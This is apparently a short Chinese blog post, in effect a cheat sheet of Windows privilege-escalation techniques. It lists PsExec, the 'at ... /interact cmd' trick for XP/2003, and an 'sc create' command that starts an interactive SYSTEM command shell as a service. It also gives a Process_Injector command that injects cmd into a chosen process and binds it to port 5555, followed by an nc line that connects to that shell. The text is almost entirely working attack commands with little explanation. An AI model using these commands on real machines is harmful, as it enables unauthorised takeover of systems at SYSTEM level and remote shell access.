windows提權

  • PsExec
  • at
  • Process_Injector
  • sc

psexec

當前用戶是jh
windows提權
提權之後
windows提權


*at命令提權(適用於xp,2003)

at 15:05 /interact cmd  

windows提權


sc

創建服務(打開cmd命令窗口的服務)

    sc Create systemcmd binPath= "cmd /K start" type= own type= interact

啓動服務剛纔創建的服務

    sc start systemcmd

process_injector

列出當前的所有進程

pinjector.exe -l

windows提權

選擇要提權成的用戶,進行進程注入

pinjector.exe -p 732 cmd 5555   #服務端實現進程注入
nc -nv 10.10.10.19 5555    # 客戶端連接服務端

windows提權

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章